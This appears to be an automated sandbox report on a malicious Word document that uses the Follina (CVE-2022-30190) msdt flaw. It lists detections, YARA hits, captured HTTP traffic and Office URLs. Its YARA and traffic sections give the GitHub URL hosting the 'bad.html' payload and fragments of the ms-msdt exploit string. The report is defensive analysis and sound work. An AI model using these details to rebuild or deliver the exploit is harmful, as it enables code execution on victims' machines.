Windows Analysis Report
dl18aYTBo5.docx

Overview

General Information

Sample Name: dl18aYTBo5.docx
Analysis ID: 686004
MD5: b91615355a11f5bb8b7c381a8bc4485a
SHA1: 7950b1730e05a2dcdd19f1a98a697798a9edbf77
SHA256: 3fdd30eb0961c98259d58327745ec253588b1553d9822d613d45d076c4b07ec1

Detection

Follina CVE-2022-30190
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Contains an external reference to another file
Detected suspicious Microsoft Office reference URL
Queries the volume information (name, serial number etc) of a device
Yara signature match
Potential document exploit detected (unknown TCP traffic)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
IP address seen in connection with other malware

Classification

  • System is w10x64
  • WINWORD.EXE (PID: 5828 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
    • MSOSYNC.EXE (PID: 5700 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
document.xml.rels | SUSP_Doc_WordXMLRels_May22 | Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation | Tobias Michalski, Christian Burkard, Wojciech Cieslak
  • 0x39:$a1: <Relationships
  • 0x77c:$a2: TargetMode="External"
  • 0x774:$x1: .html!
document.xml.rels | INDICATOR_OLE_RemoteTemplate | Detects XML relations where an OLE object is referencing an external target in dropper OOXML documents | ditekSHen
  • 0x703:$olerel: relationships/oleObject
  • 0x71c:$target1: Target="http
  • 0x77c:$mode: TargetMode="External
Source | Rule | Description | Author | Strings
sslproxydump.pcap | SUSP_PS1_Msdt_Execution_May22 | Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation | Nasreddine Bencherchali, Christian Burkard
  • 0x3d19a:$a: PCWDiagnostic
  • 0x44b3e:$a: PCWDiagnostic
  • 0x48342:$a: PCWDiagnostic
  • 0x3d18e:$sa3: ms-msdt
  • 0x44b32:$sa3: ms-msdt
  • 0x48336:$sa3: ms-msdt
  • 0x3d20d:$sb3: IT_BrowseForFile=
  • 0x44bb1:$sb3: IT_BrowseForFile=
  • 0x483b5:$sb3: IT_BrowseForFile=
sslproxydump.pcap | JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\4C4C1387.txt | SUSP_PS1_Msdt_Execution_May22 | Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation | Nasreddine Bencherchali, Christian Burkard
  • 0x1efa:$a: PCWDiagnostic
  • 0x1eee:$sa3: ms-msdt
  • 0x1f6d:$sb3: IT_BrowseForFile=
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\4C4C1387.txt | EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation | Tobias Michalski, Christian Burkard
  • 0x1edd:$re1: location.href = "ms-msdt:
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\4C4C1387.txt | JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\bad[1].html | SUSP_PS1_Msdt_Execution_May22 | Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation | Nasreddine Bencherchali, Christian Burkard
  • 0x1efa:$a: PCWDiagnostic
  • 0x1eee:$sa3: ms-msdt
  • 0x1f6d:$sb3: IT_BrowseForFile=
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\bad[1].html | EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation | Tobias Michalski, Christian Burkard
  • 0x1edd:$re1: location.href = "ms-msdt:
No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: dl18aYTBo5.docx | Avira: detected
Source: dl18aYTBo5.docx | Virustotal: Detection: 50%
Source: dl18aYTBo5.docx | Metadefender: Detection: 20%
Source: dl18aYTBo5.docx | ReversingLabs: Detection: 27%
Source: https://raw.githubusercontent.com/drgreenthumb93/CVE-2022-30190-follina/main/bad.html | Virustotal: Detection: 5%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\bad[1].html | Avira: detection malicious, Label: JS/CVE-2022-30190.G

Exploits

Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\4C4C1387.txt, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\bad[1].html, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\1BDECE2D.txt, type: DROPPED
Source: document.xml.rels | Extracted files from sample: https://raw.githubusercontent.com/drgreenthumb93/cve-2022-30190-follina/main/bad.html!
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: unknown | HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49707 version: TLS 1.2
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49716
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49716
      Source: global trafficTCP traffic: 192.168.2.4:49716 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49716
      Source: global trafficTCP traffic: 192.168.2.4:49716 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49716 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 185.199.109.133:443 -> 192.168.2.4:49716
      Source: global trafficTCP traffic: 192.168.2.4:49716 -> 185.199.109.133:443
      Source: global trafficTCP traffic: 192.168.2.4:49716 -> 185.199.109.133:443
      Source: global trafficDNS query: name: raw.githubusercontent.com
      Source: global trafficHTTP traffic detected: GET /drgreenthumb93/CVE-2022-30190-follina/main/bad.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: raw.githubusercontent.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /drgreenthumb93/CVE-2022-30190-follina/main/bad.html HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: raw.githubusercontent.comConnection: Keep-Alive
      Source: Joe Sandbox ViewASN Name: FASTLYUS FASTLYUS
      Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Joe Sandbox ViewIP Address: 185.199.109.133 185.199.109.133
      Source: Joe Sandbox ViewIP Address: 185.199.108.133 185.199.108.133
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenConnection: closeCache-Control: no-cacheContent-Type: text/html; charset=utf-8Strict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: denyX-XSS-Protection: 0Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'Accept-Ranges: bytesDate: Thu, 18 Aug 2022 01:57:05 GMTVia: 1.1 varnishX-Served-By: cache-mxp6929-MXPX-Cache: MISSX-Cache-Hits: 0X-Timer: S1660787826.582963,VS0,VE9Access-Control-Allow-Origin: *X-Fastly-Request-ID: 3ff7e4b791bcf59d1adae5143531aa79a139b0deExpires: Thu, 18 Aug 2022 02:02:05 GMTVary: Authorization,Accept-Encodingtransfer-encoding: chunked
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 14Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandboxStrict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: denyX-XSS-Protection: 1; mode=blockContent-Type: text/plain; charset=utf-8X-GitHub-Request-Id: 7924:06B9:5187D0:55A96E:62FD9C71Accept-Ranges: bytesDate: Thu, 18 Aug 2022 01:57:05 GMTVia: 1.1 varnishX-Served-By: cache-mxp6939-MXPX-Cache: MISSX-Cache-Hits: 0X-Timer: S1660787826.732014,VS0,VE121Vary: Authorization,Accept-Encoding,OriginAccess-Control-Allow-Origin: *X-Fastly-Request-ID: b9594ed1c6d167616f9ea3a4eaa3aa878f0b48f7Expires: Thu, 18 Aug 2022 02:02:05 GMTSource-Age: 0
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenConnection: closeCache-Control: no-cacheContent-Type: text/html; charset=utf-8Strict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: denyX-XSS-Protection: 0Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'Accept-Ranges: bytesDate: Thu, 18 Aug 2022 01:57:08 GMTVia: 1.1 varnishX-Served-By: cache-mxp6942-MXPX-Cache: MISSX-Cache-Hits: 0X-Timer: S1660787829.961872,VS0,VE9Access-Control-Allow-Origin: *X-Fastly-Request-ID: 1e438572101bdeafcc9fe390762dd85dc0c41b96Expires: Thu, 18 Aug 2022 02:02:08 GMTVary: Authorization,Accept-Encodingtransfer-encoding: chunked
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 14Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandboxStrict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: denyX-XSS-Protection: 1; mode=blockContent-Type: text/plain; charset=utf-8X-GitHub-Request-Id: 7924:06B9:5187D0:55A96E:62FD9C71Accept-Ranges: bytesDate: Thu, 18 Aug 2022 01:57:09 GMTVia: 1.1 varnishX-Served-By: cache-mxp6955-MXPX-Cache: HITX-Cache-Hits: 1X-Timer: S1660787830.535497,VS0,VE0Vary: Authorization,Accept-Encoding,OriginAccess-Control-Allow-Origin: *X-Fastly-Request-ID: 4aa7bf1bd86ec554d4344a3b644d235210eff816Expires: Thu, 18 Aug 2022 02:02:09 GMTSource-Age: 4
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 14Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandboxStrict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: denyX-XSS-Protection: 1; mode=blockContent-Type: text/plain; charset=utf-8X-GitHub-Request-Id: 7924:06B9:5187D0:55A96E:62FD9C71Accept-Ranges: bytesDate: Thu, 18 Aug 2022 01:57:09 GMTVia: 1.1 varnishX-Served-By: cache-mxp6925-MXPX-Cache: HITX-Cache-Hits: 1X-Timer: S1660787830.792096,VS0,VE1Vary: Authorization,Accept-Encoding,OriginAccess-Control-Allow-Origin: *X-Fastly-Request-ID: 8f764b5df9319996b8b6c3a33902dda0dd52d219Expires: Thu, 18 Aug 2022 02:02:09 GMTSource-Age: 4
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenConnection: closeCache-Control: no-cacheContent-Type: text/html; charset=utf-8Strict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: denyX-XSS-Protection: 0Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'Accept-Ranges: bytesDate: Thu, 18 Aug 2022 01:57:09 GMTVia: 1.1 varnishX-Served-By: cache-mxp6950-MXPX-Cache: MISSX-Cache-Hits: 0X-Timer: S1660787830.911926,VS0,VE9Access-Control-Allow-Origin: *X-Fastly-Request-ID: 90f3b6f9be95938ba8c5b82af688f9434fb26d83Expires: Thu, 18 Aug 2022 02:02:09 GMTVary: Authorization,Accept-Encodingtransfer-encoding: chunked
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 14Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandboxStrict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: denyX-XSS-Protection: 1; mode=blockContent-Type: text/plain; charset=utf-8X-GitHub-Request-Id: 7924:06B9:5187D0:55A96E:62FD9C71Accept-Ranges: bytesDate: Thu, 18 Aug 2022 01:57:10 GMTVia: 1.1 varnishX-Served-By: cache-mxp6956-MXPX-Cache: HITX-Cache-Hits: 1X-Timer: S1660787830.028214,VS0,VE0Vary: Authorization,Accept-Encoding,OriginAccess-Control-Allow-Origin: *X-Fastly-Request-ID: c51a7588355283b280daf7ac0379487c3b85e255Expires: Thu, 18 Aug 2022 02:02:10 GMTSource-Age: 4
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 14Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandboxStrict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: denyX-XSS-Protection: 1; mode=blockContent-Type: text/plain; charset=utf-8X-GitHub-Request-Id: 7924:06B9:5187D0:55A96E:62FD9C71Accept-Ranges: bytesDate: Thu, 18 Aug 2022 01:57:10 GMTVia: 1.1 varnishX-Served-By: cache-mxp6925-MXPX-Cache: HITX-Cache-Hits: 2X-Timer: S1660787830.367433,VS0,VE0Vary: Authorization,Accept-Encoding,OriginAccess-Control-Allow-Origin: *X-Fastly-Request-ID: f1cb60f7c941317068e3e73d7fbbe8ce8a5f2458Expires: Thu, 18 Aug 2022 02:02:10 GMTSource-Age: 5
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 14Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandboxStrict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: denyX-XSS-Protection: 1; mode=blockContent-Type: text/plain; charset=utf-8X-GitHub-Request-Id: 7924:06B9:5187D0:55A96E:62FD9C71Accept-Ranges: bytesDate: Thu, 18 Aug 2022 01:57:10 GMTVia: 1.1 varnishX-Served-By: cache-mxp6941-MXPX-Cache: HITX-Cache-Hits: 1X-Timer: S1660787831.680249,VS0,VE0Vary: Authorization,Accept-Encoding,OriginAccess-Control-Allow-Origin: *X-Fastly-Request-ID: 9cc769d5c6e06fa7a2b3dd1d9f39dd18e6512588Expires: Thu, 18 Aug 2022 02:02:10 GMTSource-Age: 5
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 14Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandboxStrict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: denyX-XSS-Protection: 1; mode=blockContent-Type: text/plain; charset=utf-8X-GitHub-Request-Id: 7924:06B9:5187D0:55A96E:62FD9C71Accept-Ranges: bytesDate: Thu, 18 Aug 2022 01:57:12 GMTVia: 1.1 varnishX-Served-By: cache-mxp6942-MXPX-Cache: HITX-Cache-Hits: 1X-Timer: S1660787833.802035,VS0,VE1Vary: Authorization,Accept-Encoding,OriginAccess-Control-Allow-Origin: *X-Fastly-Request-ID: 171bdafc3cc43db5bb8271a13736edb38baa21b4Expires: Thu, 18 Aug 2022 02:02:12 GMTSource-Age: 7
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://clients.config.office.net/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://config.edge.skype.com
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://cortana.ai
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://cortana.ai/api
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://cr.office.com
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://dataservice.o365filtering.com
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://dataservice.o365filtering.com/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://dev.cortana.ai
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://devnull.onenote.com
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://directory.services.
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://enrichment.osi.office.net/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://graph.ppe.windows.net
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://graph.ppe.windows.net/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://graph.windows.net
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://graph.windows.net/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://incidents.diagnostics.office.com
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://inclient.store.office.com/gyro/client
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://invites.office.com/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://lifecycle.office.com
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://login.microsoftonline.com/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://login.windows.local
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://management.azure.com
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://management.azure.com/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://messaging.action.office.com/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://messaging.action.office.com/setcampaignaction
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://messaging.action.office.com/setuseraction16
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://messaging.engagement.office.com/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://messaging.lifecycle.office.com/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://messaging.office.com/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://my.microsoftpersonalcontent.com
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://ncus.contentsync.
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://ncus.pagecontentsync.
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://officeapps.live.com
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
      Source: CE458921-C0C4-4579-9BB4-3A4F11873036.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
